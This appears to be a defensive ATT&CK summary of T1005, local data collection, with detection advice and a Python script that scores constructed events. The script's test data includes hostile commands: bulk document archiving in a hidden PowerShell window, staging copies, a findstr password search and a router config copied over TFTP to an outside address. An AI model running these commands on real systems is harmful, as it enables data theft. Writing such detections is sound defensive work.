MITRE Technique [T1005] Data from Local System

[T1005] Data from Local System – Adversaries search local files, configurations, virtual machine images, and local databases to find sensitive data for later exfiltration; monitoring command activity and system API calls helps detect this behavior. #DataFromLocalSystem #T1005

Keypoints

  • Adversaries enumerate file systems and local stores to locate sensitive data quickly.
  • Command and scripting interpreters like cmd, PowerShell, and network CLIs are commonly used.
  • Automated collection tools and scripts increase speed and reduce manual footprint.
  • Monitor process creation, command-line arguments, and OS API calls for suspicious access.
  • Collect and analyze AAA and CLI logs on network devices to catch configuration exfiltration.

Description:

  • Like a burglar rifling through drawers and safes inside a house, adversaries search a system's local files and settings to find valuable information before leaving with it.
  • Adversaries use local file access, scripting interpreters, management APIs, and device CLIs to gather files, configuration data, and databases; the collected data is typically staged and then exfiltrated, so detecting the collection step early is the best chance to prevent data loss.

Detection:

  • Monitor process creation and command-line arguments for file collection patterns, using EDR to capture full command-line and parent process context.
  • Alert on suspicious use of scripting interpreters (PowerShell, cmd, bash) performing bulk file reads or archive creation; enable PowerShell/Script Block logging and transcription.
  • Capture and analyze OS API file access events (ReadFile, NtCreateFile) for unusual volume or access to sensitive directories; use native auditing or kernel-level sensors.
  • Collect AAA and CLI logs from network devices and alert on unexpected show/config retrieval commands and file copy actions from non-standard accounts or locations.
  • Monitor Windows management tools (WMI, WinRM) for remote queries and scripted file enumeration; correlate with unexpected logon locations or lateral movement indicators.
  • Implement file integrity monitoring and DLP rules to flag mass reads of sensitive file types and VM disk images; tune policies to reduce false positives from backups and maintenance.
  • Use behavioral baselines and anomaly detection to spot deviations in file access patterns; combine telemetry from EDR, SIEM, and network logs for context-rich alerts and faster investigations.
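The detection bullets above describe patterns rather than concrete rules. As an added example that is not part of the original page or of ATT&CK, the Python below scores constructed process-creation events (Sysmon Event ID 1 style fields: host, user, parent, image, command line) and constructed network-device AAA command-accounting lines against those patterns: recursive enumeration by a scripting interpreter, sensitive file types, archive or copy to a staging path, credential keyword searches, an interpreter spawned by an Office application, and configuration retrieval on a network device from a non-standard account or address or to an off-box target. The hosts, users, paths, addresses, the admin account, the management subnet and the allowlisted backup-script path are all assumptions made up for the example; the allowlist shows the tuning the last bullet asks for.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden Get-ChildItem C:\\Users -Recurse -Include *.docx,*.xlsx,*.pdf "
                "| Compress-Archive -DestinationPath C:\\Windows\\Temp\\out.zip"},
    {"host": "WS01", "user": "CORP\\jdoe", "parent": "cmd.exe", "image": "forfiles.exe",
     "cmdline": 'forfiles /P C:\\Users /S /M *.doc* /C "cmd /c copy @path C:\\ProgramData\\stage\\"'},
    {"host": "WS02", "user": "CORP\\svc_backup", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -File "C:\\Program Files\\Backup\\nightly.ps1"'},
    {"host": "WS03", "user": "CORP\\asmith", "parent": "winword.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c findstr /S /I password C:\\Users\\asmith\\Documents\\*.txt > C:\\Users\\Public\\p.txt"},
    {"host": "WS04", "user": "CORP\\lhall", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c dir /S C:\\Users\\*.xlsx"},
    {"host": "SRV01", "user": "CORP\\admin", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\admin\\notes.txt"},
]

# Constructed network-device AAA command-accounting lines (Cisco-style); not real logs.
CLI_LOGS = [
    "Jan 10 02:14:07 rtr-core1 aaa: user=netops addr=10.0.5.21 cmd='show running-config'",
    "Jan 10 02:14:19 rtr-core1 aaa: user=netops addr=10.0.5.21 cmd='copy running-config tftp://203.0.113.9/rtr.cfg'",
    "Jan 10 03:02:44 rtr-core1 aaa: user=guest addr=192.168.44.8 cmd='show running-config'",
    "Jan 10 08:30:01 rtr-core1 aaa: user=netops addr=10.0.5.21 cmd='show interfaces'",
]

# Host rules: interpreters and the command-line indicators of bulk local collection
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "forfiles.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
RECURSIVE = re.compile(r"-recurse\b|/s\b", re.I)
SENSITIVE_EXT = re.compile(r"\*\.(docx?|xlsx?|pdf|pst|kdbx|vmdk|vhdx?|sqlite|db)\b", re.I)
STAGING = re.compile(r"compress-archive|\b(7z|rar|zip|tar|copy|xcopy|robocopy)\b", re.I)
CRED_HUNT = re.compile(r"\bfindstr\b.*/[si]\b.*(password|passwd|secret)", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
# Tuning allowlist: known maintenance/backup tooling path (assumed for the example), lower-cased
ALLOWLISTED_PATHS = ("c:\\program files\\backup\\",)

# Network-device rules: assumed admin account and management subnet
CONFIG_CMDS = re.compile(r"\b(show|copy) (running|startup)-config\b", re.I)
OFFBOX = re.compile(r"\b(tftp|ftp|scp|http|https)://", re.I)
ADMIN_ACCOUNTS = {"netops"}
ADMIN_SUBNETS = ("10.0.5.",)
CLI_RE = re.compile(r"user=(?P<user>\S+) addr=(?P<addr>\S+) cmd='(?P<cmd>[^']*)'")


def severity(score):
    return "high" if score >= 75 else "medium" if score >= 50 else "low" if score > 0 else "none"


def score_event(ev):
    """Return (score, reasons) for one process-creation event; 25 points per matched indicator."""
    cmd = ev["cmdline"]
    if any(p in cmd.lower() for p in ALLOWLISTED_PATHS):
        return 0, ["allowlisted maintenance path"]
    image, parent = ev["image"].lower(), ev["parent"].lower()
    reasons = []
    if image in INTERPRETERS:
        checks = [(RECURSIVE, "recursive enumeration"), (SENSITIVE_EXT, "sensitive file types"),
                  (STAGING, "archive/copy to staging"), (CRED_HUNT, "credential keyword search"),
                  (HIDDEN, "hidden window")]
        reasons += [label for rx, label in checks if rx.search(cmd)]
        if parent in OFFICE_APPS:
            reasons.append("interpreter spawned by Office app")
    return 25 * len(reasons), reasons


def score_cli_line(line):
    """Return (score, reasons) for one AAA command-accounting line."""
    m = CLI_RE.search(line)
    if not m:
        return 0, ["unparsed line"]
    user, addr, cmd = m.group("user"), m.group("addr"), m.group("cmd")
    reasons = []
    if CONFIG_CMDS.search(cmd):
        reasons.append("configuration retrieval")
        if user not in ADMIN_ACCOUNTS:
            reasons.append("non-standard account")
        if not addr.startswith(ADMIN_SUBNETS):
            reasons.append("non-standard source address")
        if OFFBOX.search(cmd):
            reasons.append("configuration copied off-box")
    return 25 * len(reasons), reasons


def run():
    """Score every constructed input; returns a list of (subject, severity, reasons)."""
    out = []
    for ev in EVENTS:
        s, r = score_event(ev)
        out.append((f'{ev["host"]}:{ev["image"]}', severity(s), r))
    for line in CLI_LOGS:
        s, r = score_cli_line(line)
        out.append((line.split("cmd=")[1], severity(s), r))
    return out


if __name__ == "__main__":
    for subject, sev, reasons in run():
        if sev != "none":
            print(f"[{sev:6}] {subject}: {', '.join(reasons)}")
```

Routine admin retrieval of a running configuration from the management subnet scores low on its own; the same command copying the config to an off-box TFTP target, or issued by an unexpected account from an unexpected address, is what raises it. On the host side, a single indicator (one recursive listing) is noise, and the allowlisted backup path suppresses the scheduled job entirely; combinations of enumeration, sensitive extensions and staging are what the EDR alert should key on.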

Tactics:
Collection

Platforms:
ESXi, Linux, Network Devices, Windows, macOS

Data Sources:
Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution

Relationship Citations:
(Citation: Cybereason StrifeWater Feb 2022),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: McAfee Night Dragon),(Citation: Kaspersky TajMahal April 2019),(Citation: NCSC Joint Report Public Tools),(Citation: Bitdefender LuminousMoth July 2021),(Citation: group-ib_redcurl1),(Citation: BlackBerry Amadey 2020),(Citation: RiskIQ British Airways September 2018),(Citation: SentinelLabs Metador Sept 2022),(Citation: Cybereason Bumblebee August 2022),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Novetta Blockbuster),(Citation: Wevtutil Microsoft Documentation),(Citation: Microsoft Actinium February 2022),(Citation: ESET EvasivePanda 2023),(Citation: Cybereason Kimsuky November 2020),(Citation: ESET Turla PowerShell May 2019),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Kaspersky QakBot September 2021),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: TrendMicro Pawn Storm 2019),(Citation: Palo Alto Brute Ratel July 2022),(Citation: SecureWorks August 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Talos GravityRAT),(Citation: PowerSploit Documentation),(Citation: Symantec Chafer February 2018),(Citation: FBI FLASH APT39 September 2020),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: ESET Gamaredon June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gelsemium June 2021),(Citation: Scarlet Mimic Jan 2016),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: ASERT Donot March 2018),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: McAfee GhostSecret),(Citation: CISA AA20-239A BeagleBoyz August 2020),
(Citation: Volexity SolarWinds),(Citation: Group IB APT 41 June 2021),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: ClearSky Siamesekitten August 2021),(Citation: trendmicro xcsset xcode project 2020),(Citation: KISA Operation Muzabi),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Mandiant APT1),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: SentinelOne Agrius 2021),(Citation: CISA WellMess July 2020),(Citation: NSA/FBI Drovorub August 2020),(Citation: Accenture Lyceum Targets November 2021),(Citation: Mandiant FIN12 Oct 2021),(Citation: Cylance Dust Storm),(Citation: Lunghi Iron Tiger Linux),(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: F-Secure The Dukes),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: ESET Crutch December 2020),(Citation: Check Point Warzone Feb 2020),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Palo Alto Rover),(Citation: Accenture MUDCARP March 2019),(Citation: McAfee Honeybee),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: CyberBit Dtrack),(Citation: Cymmetria Patchwork),(Citation: Secureworks MCMD July 2019),(Citation: Trend Micro Muddy Water March 2021),(Citation: S2W Racoon 2022),(Citation: Kroll RawPOS Jan 2017),(Citation: Symantec Troll Stealer 2024),(Citation: Cybereason Bazar July 2020),(Citation: Red Canary 2021 Threat Detection Report March 2021),(Citation: ESET Machete July 2019),(Citation: Huntress NPPSPY 2022),(Citation: Korean FSI TA505 2020),(Citation: Talos Frankenstein June 2019),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Symantec Hydraq Jan 2010),
(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Mandiant APT41),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: ESET Dukes October 2019),(Citation: ESET ForSSHe December 2018),(Citation: FireEye Periscope March 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: FoxIT Wocao December 2019),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Cybereason Cobalt Kitty 2017),(Citation: aptsim),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Microsoft GALLIUM December 2019),(Citation: DOJ APT10 Dec 2018),(Citation: FireEye APT30),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Malwarebytes Konni Aug 2021),(Citation: Symantec Linfo May 2012),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: PWC WellMess July 2020),(Citation: US-CERT TA18-074A),(Citation: RiskIQ Newegg September 2018),(Citation: FOX-IT May 2016 Mofang),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Trend Micro Earth Simnavaz October 2024),(Citation: FBI Lockbit 2.0 FEB 2022),(Citation: Kaspersky ToddyCat June 2022),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Trend Micro FIN6 October 2019),(Citation: Symantec Cicada November 2020),(Citation: Securelist Calisto July 2018),(Citation: Symantec FIN8 Jul 2023),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: ESET Nomadic Octopus 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Forcepoint Monsoon),(Citation: Symantec Darkmoon Aug 2005),(Citation: Red Canary Qbot),(Citation: Talos Bisonal Mar 2020),(Citation: CISA GRU29155 2024),(Citation: Überwachung APT28 Forfiles June 2015),(Citation: Trend Micro IXESHE 2012),
(Citation: CISA WellMail July 2020),(Citation: Google Cloud APT41 2024),(Citation: Talos Kimsuky Nov 2021),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: FireEye Fin8 May 2016),(Citation: ESET InvisiMole June 2018),(Citation: TrendMicro RawPOS April 2015),(Citation: Kaspersky LuminousMoth July 2021),(Citation: Talos ZxShell Oct 2014),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Fidelis njRAT June 2013),(Citation: Crowdstrike HuntReport 2022),(Citation: NCCGroup RokRat Nov 2018),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: DFIR Phosphorus November 2021),(Citation: Unit42 Agrius 2023),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Novetta-Axiom),(Citation: GitHub PowerSploit May 2012),(Citation: Eset Ramsay May 2020),(Citation: Cybereason StealBit Exfiltration Tool),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Malwarebytes Saint Bot April 2021),(Citation: ESET DazzleSpy Jan 2022),(Citation: FireEye MuddyWater Mar 2018),(Citation: Talos TinyTurla September 2021),(Citation: S2 Grupo TrickBot June 2017),(Citation: TrendMicro Taidoor),(Citation: Lee 2013),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Cybereason PowerLess February 2022),(Citation: PaloAlto Patchwork Mar 2018),(Citation: McAfee Sharpshooter December 2018),(Citation: Volexity UPSTYLE 2024),(Citation: NTT Security Flagpro new December 2021),(Citation: CrowdStrike IceApple May 2022),(Citation: Kaspersky APT Trends Q1 2020),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: Group IB GrimAgent July 2021),(Citation: McAfee Lazarus Jul 2020),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: S2W Troll Stealer 2024),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: FSI Andariel Campaign Rifle July 2017),(Citation: HP SVCReady Jun 2022),(Citation: Bitsight Latrodectus June 2024),
(Citation: F-Secure Lazarus Cryptocurrency Aug 2020),(Citation: group-ib_redcurl2),(Citation: Mandiant FIN13 Aug 2022),(Citation: Symantec Pasam May 2012),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Lookout Dark Caracal Jan 2018),(Citation: F-Secure Cosmicduke),(Citation: Kaspersky Lyceum October 2021),(Citation: Microsoft NICKEL December 2021),(Citation: Unit 42 PingPull Jun 2022),(Citation: Trustwave Pillowmint June 2020),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: Profero APT27 December 2020),(Citation: ANSSI Sandworm January 2021),(Citation: FireEye APT37 Feb 2018),(Citation: Mandiant ROADSWEEP August 2022),(Citation: ESET LightNeuron May 2019),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Rapid7 BlackBasta 2024),(Citation: Microsoft POLONIUM June 2022),(Citation: Github Koadic),(Citation: CheckPoint Bandook Nov 2020),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Cybereason Soft Cell June 2019),(Citation: Antiy CERT Ramsay April 2020),(Citation: Proofpoint TA505 October 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Novetta Blockbuster RATs),(Citation: Unit 42 Kazuar May 2017),(Citation: Check Point APT34 April 2021),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: Rapid7 HAFNIUM Mar 2021),(Citation: Securelist Kimsuky Sept 2013),(Citation: McAfee Bankshot),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022),(Citation: Sekoia Raccoon2 2022),(Citation: Microsoft Silk Typhoon MAR 2025),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Bitdefender Naikon April 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: Novetta Blockbuster Loaders),
(Citation: MoustachedBouncer ESET August 2023),(Citation: MSTIC FoggyWeb September 2021)

Read More: https://attack.mitre.org/techniques/T1005